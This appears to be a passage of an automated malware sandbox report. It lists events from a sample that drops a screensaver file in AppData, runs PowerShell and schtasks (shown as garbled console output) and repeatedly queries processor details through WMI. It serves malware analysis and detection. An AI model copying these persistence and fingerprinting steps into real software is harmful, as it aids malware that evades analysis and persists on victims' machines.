                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.d.......4..........................s.................... .......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d.......A..........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d.......S..........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d......._..........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....u..........................s....................$.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................l.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................!..........................s............x...............8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................-..........................s............x...............8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........E..........................s............x....... .......8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Q..........................s............x...............8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................g..........................s............................8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................s..........................s............x...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............x.......$.......8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x...............8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............x.......2.......8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x...............8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................l.......8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x...............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............x...............8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x...............8...............Jump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.....$.......@.......................................................................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................5.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................&5.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................55.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................e5.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................5.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................5.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................5.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........5.........................s.................... .......h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................. 6.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................96.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................I6.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....c6.........................s....................$.......h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................t6.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s....................l.......h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................7.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................7.........................s............................h...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................++.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................@+.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................L+.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................^+.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................k+.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................}+.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........+.........................s.................... .......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......+.........................s....................$.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................$,.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................H,.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................],.........................s....................l.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................i,.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................{,.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................x...............
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ............................(......................................x.$.............................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P..............................(..............................................j.......x...............
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
